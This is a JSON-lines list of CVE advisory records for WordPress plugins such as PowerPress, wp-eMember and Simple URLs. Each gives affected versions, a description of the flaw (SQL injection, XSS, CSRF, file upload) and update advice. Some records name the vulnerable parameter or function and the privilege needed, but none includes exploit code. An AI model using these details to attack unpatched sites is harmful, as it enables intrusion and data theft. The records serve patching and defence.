{"CVE_ID":"CVE-2023-5435","slug":"up-down-image-slideshow-gallery","versionImpact":"12.0","versionEndExcluding":"12.1","description":"The Up down image slideshow gallery plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/up-down-image-slideshow-gallery\\\/trunk\\\/up-down-image-slideshow-gallery.php?rev=2827173#L208\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/up-down-image-slideshow-gallery\\\/trunk\\\/up-down-image-slideshow-gallery.php?rev=2827173#L208\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b72cf6f-4924-4fa5-8e1a-4054dfe73be0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b72cf6f-4924-4fa5-8e1a-4054dfe73be0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985497\\\/up-down-image-slideshow-gallery#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985497\\\/up-down-image-slideshow-gallery#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5431","slug":"left-right-image-slideshow-gallery","versionImpact":"12.0","versionEndExcluding":"12.1","description":"The Left right image slideshow gallery plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 12.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69902627-ce79-4a43-8949-43db6a9cc0dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69902627-ce79-4a43-8949-43db6a9cc0dd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/left-right-image-slideshow-gallery\\\/trunk\\\/left-right-image-slideshow-gallery.php?rev=2827127#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/left-right-image-slideshow-gallery\\\/trunk\\\/left-right-image-slideshow-gallery.php?rev=2827127#L211\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985417\\\/left-right-image-slideshow-gallery#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985417\\\/left-right-image-slideshow-gallery#file0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0099","slug":"simple-urls","versionEndExcluding":"115","description":"The Simple URLs WordPress plugin before 115 does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd50f2d6-e420-4220-b485-73f33227e8f8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd50f2d6-e420-4220-b485-73f33227e8f8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0098","slug":"simple-urls","versionEndExcluding":"115","description":"The Simple URLs WordPress plugin before 115 does not escape some parameters before using them in various SQL statements used by AJAX actions available by any authenticated users, leading to a SQL injection exploitable by low privilege users such as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db0b3275-40df-404e-aa8d-53558f0122d8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db0b3275-40df-404e-aa8d-53558f0122d8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9543","slug":"powerpress","versionImpact":"11.9.18","versionEndExcluding":"11.9.19","description":"The PowerPress Podcasting plugin by Blubrry for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'skipto' shortcode in all versions up to, and including, 11.9.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 11.9.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b33c180-10b4-4550-8c24-72c9e53664a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b33c180-10b4-4550-8c24-72c9e53664a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/tags\\\/11.9.17\\\/powerpress-player.php#L1748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/tags\\\/11.9.17\\\/powerpress-player.php#L1748\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/tags\\\/11.9.17\\\/powerpress.php#L4094\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/tags\\\/11.9.17\\\/powerpress.php#L4094\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blubrry.com\\\/support\\\/powerpress-documentation\\\/skip-to-position-in-player\\\/\",\"name\":\"https:\\\/\\\/blubrry.com\\\/support\\\/powerpress-documentation\\\/skip-to-position-in-player\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166085\\\/powerpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166085\\\/powerpress\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9230","slug":"powerpress","versionImpact":"11.9.17","versionEndExcluding":"11.9.18","description":"The PowerPress Podcasting plugin by Blubrry WordPress plugin before 11.9.18 does not sanitise and escape some of its settings when adding a podcast, which could allow author and above users to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 11.9.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab5eaf57-fb61-4a08-b439-42dea40b7914\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab5eaf57-fb61-4a08-b439-42dea40b7914\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9227","slug":"powerpress","versionImpact":"11.9.17","versionEndExcluding":"11.9.18","description":"The PowerPress Podcasting plugin by Blubrry WordPress plugin before 11.9.18 does not sanitise and escape some of its settings when adding a podcast, which could allow admin users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","recommendation":"Update to version 11.9.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb6515b9-a316-4146-8b7d-9b70a47aa366\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb6515b9-a316-4146-8b7d-9b70a47aa366\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6037","slug":"wp-tripadvisor-review-slider","versionImpact":"11.8","versionEndExcluding":"11.9","description":"The WP TripAdvisor Review Slider WordPress plugin before 11.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 11.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/753df046-9fd7-4d15-9114-45cde6d6539b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/753df046-9fd7-4d15-9114-45cde6d6539b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0259","slug":"wp-google-places-review-slider","versionEndExcluding":"11.8","description":"The WP Google Review Slider WordPress plugin before 11.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3bb0eac-1f4e-4191-8f3b-104a5bb54558\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3bb0eac-1f4e-4191-8f3b-104a5bb54558\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47554","slug":"css3_web_pricing_tables_grids","versionImpact":"11.6","versionEndExcluding":"11.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QuanticaLabs CSS3 Compare Pricing Tables for WordPress allows Reflected XSS. This issue affects CSS3 Compare Pricing Tables for WordPress: from n\/a through 11.6.","recommendation":"Update to version 11.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_web_pricing_tables_grids\\\/vulnerability\\\/wordpress-css3-compare-pricing-tables-for-wordpress-plugin-11-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_web_pricing_tables_grids\\\/vulnerability\\\/wordpress-css3-compare-pricing-tables-for-wordpress-plugin-11-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12420","slug":"wpappninja","versionImpact":"11.52","versionEndExcluding":"11.53","description":"The WPMobile.App \u2014 Android and iOS Mobile Application plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 11.52. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 11.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207040%40wpappninja&new=3207040%40wpappninja&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207040%40wpappninja&new=3207040%40wpappninja&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad03e3f-fb3e-4a80-9eea-d24459ed62b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad03e3f-fb3e-4a80-9eea-d24459ed62b8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11804","slug":"planaday-api","versionImpact":"11.4","versionEndExcluding":"11.5","description":"The Planaday API plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 11.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 11.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204693%40planaday-api&new=3204693%40planaday-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204693%40planaday-api&new=3204693%40planaday-api&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/910cf7bd-1c2b-4e08-9088-e95ea6867ac3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/910cf7bd-1c2b-4e08-9088-e95ea6867ac3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9204","slug":"404page","versionImpact":"11.4.7","versionEndExcluding":"11.4.8","description":"The Smart Custom 404 Error Page plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 11.4.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 11.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93928123-c90d-4bbb-b51d-33e809867b79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93928123-c90d-4bbb-b51d-33e809867b79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404page\\\/tags\\\/11.4.7\\\/inc\\\/class-404page.php#L1227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404page\\\/tags\\\/11.4.7\\\/inc\\\/class-404page.php#L1227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404page\\\/tags\\\/11.4.7\\\/functions.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404page\\\/tags\\\/11.4.7\\\/functions.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161639\\\/#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161639\\\/#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3616","slug":"greenshift-animation-and-page-builder-blocks","versionImpact":"11.4.5","versionEndExcluding":"11.4.6","description":"The Greenshift \u2013 animation and page builder blocks plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the gspb_make_proxy_api_request() function in versions 11.4 to 11.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The arbitrary file upload was sufficiently patched in 11.4.5, but a capability check was added in 11.4.6 to properly prevent unauthorized limited file uploads.","recommendation":"Update to version 11.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php#L3340\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php#L3340\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270279\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3270279\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3273212\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3273212\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276168\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276168\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/init.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0db4671e-1989-44a4-babe-ed699c7f3a52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0db4671e-1989-44a4-babe-ed699c7f3a52?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4930","slug":"front-end-pm","versionEndExcluding":"11.4.3","description":"The Front End PM WordPress plugin before 11.4.3 does not block listing the contents of the directories where it stores attachments to private messages, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled.","recommendation":"Update to version 11.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c73b3276-e6f1-4f22-a888-025e5d0504f2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c73b3276-e6f1-4f22-a888-025e5d0504f2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4019","slug":"media-from-ftp","versionEndExcluding":"11.17","description":"The Media from FTP WordPress plugin before 11.17 does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d323b07-c6e7-4aba-85bc-64659ad0c85d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d323b07-c6e7-4aba-85bc-64659ad0c85d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5879","slug":"leadin","versionImpact":"11.1.22","versionEndExcluding":"11.1.34","description":"The HubSpot \u2013 CRM, Email Marketing, Live Chat, Forms & Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute of the HubSpot Meeting Widget in all versions up to, and including, 11.1.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 11.1.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac004fb0-e178-4e9b-9aa3-b14eab43f22d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac004fb0-e178-4e9b-9aa3-b14eab43f22d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leadin\\\/tags\\\/11.1.13\\\/public\\\/admin\\\/widgets\\\/class-elementormeeting.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leadin\\\/tags\\\/11.1.13\\\/public\\\/admin\\\/widgets\\\/class-elementormeeting.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123662\\\/leadin\\\/trunk\\\/public\\\/admin\\\/widgets\\\/class-elementormeeting.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123662\\\/leadin\\\/trunk\\\/public\\\/admin\\\/widgets\\\/class-elementormeeting.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4820","slug":"powerpress","versionEndExcluding":"11.0.12","description":"The PowerPress Podcasting plugin by Blubrry for WordPress before 11.0.12 does not sanitize and escape the media url field in posts, which could allow users with privileges as low as Contributor to inject arbitrary web scripts that could target a site admin or super admin.","recommendation":"Update to version 11.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e866a214-a142-43c7-b93d-ff2301a3e432\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e866a214-a142-43c7-b93d-ff2301a3e432\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9882","slug":"salon-booking-system","versionImpact":"10.9.3","versionEndExcluding":"10.9.4","description":"The Salon Booking System, Appointment Scheduling for Salons, Spas & Small Businesses WordPress plugin before 10.9.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 10.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f7667fd-6ac6-4c90-aaf0-c7862bd8e9bd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f7667fd-6ac6-4c90-aaf0-c7862bd8e9bd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13323","slug":"booking","versionImpact":"10.9.2","versionEndExcluding":"10.9.3","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'booking' shortcode in all versions up to, and including, 10.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 10.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/js\\\/client.js#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/js\\\/client.js#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220625\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220625\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37731e51-33ce-4ef3-8a13-976c005dc983?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37731e51-33ce-4ef3-8a13-976c005dc983?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3254","slug":"wp-reviews-plugin-for-google","versionImpact":"10.9","versionEndExcluding":"10.9.1","description":"The Widgets for Google Reviews plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 10.9. This is due to missing or incorrect nonce validation within setup_no_reg_header.php. This makes it possible for unauthenticated attackers to reset plugin settings and remove reviews via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 10.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70968476-b064-477f-999f-4aa2c51d89cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70968476-b064-477f-999f-4aa2c51d89cc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2980022%40wp-reviews-plugin-for-google%2Ftrunk&old=2977531%40wp-reviews-plugin-for-google%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2980022%40wp-reviews-plugin-for-google%2Ftrunk&old=2977531%40wp-reviews-plugin-for-google%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0261","slug":"wp-tripadvisor-review-slider","versionEndExcluding":"10.8","description":"The WP TripAdvisor Review Slider WordPress plugin before 10.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a3b6752-8d72-4ab4-9d49-b722a947d2b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a3b6752-8d72-4ab4-9d49-b722a947d2b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5081","slug":"wp-emember","versionEndExcluding":"10.7.0","description":"The wp-eMember WordPress plugin before v10.7.0 does not have a CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 10.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f02bdb5-5cf6-4519-9586-fd4fb3d45dea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f02bdb5-5cf6-4519-9586-fd4fb3d45dea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5744","slug":"wp-emember","versionImpact":"10.6.6","versionEndExcluding":"10.6.7","description":"The wp-eMember WordPress plugin before 10.6.7 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 10.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba50e25c-7250-4025-a72f-74f8eb756246\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba50e25c-7250-4025-a72f-74f8eb756246\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5715","slug":"wp-emember","versionImpact":"10.6.6","versionEndExcluding":"10.6.7","description":"The wp-eMember WordPress plugin before 10.6.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 10.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d86bc001-51ae-4dcc-869b-80c91251cc2e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d86bc001-51ae-4dcc-869b-80c91251cc2e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5079","slug":"wp-emember","versionImpact":"10.6.6","versionEndExcluding":"10.6.7","description":"The wp-eMember WordPress plugin before 10.6.7 does not sanitise and escape some of the fields when members register, which allows unauthenticated users to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 10.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdb5509e-80ab-4e47-83a4-9347796eec40\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdb5509e-80ab-4e47-83a4-9347796eec40\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5080","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not validate files to be uploaded, which could allow admins to upload arbitrary files such as PHP on the server","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15f78aad-001c-4219-aa7e-46537e1357a2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15f78aad-001c-4219-aa7e-46537e1357a2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5077","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not have a CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00fcbcf3-41ee-45e7-a0a9-0d46cb7ef859\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00fcbcf3-41ee-45e7-a0a9-0d46cb7ef859\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5076","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01cbc841-a30f-4df5-ab7f-0c2c7469657b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01cbc841-a30f-4df5-ab7f-0c2c7469657b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
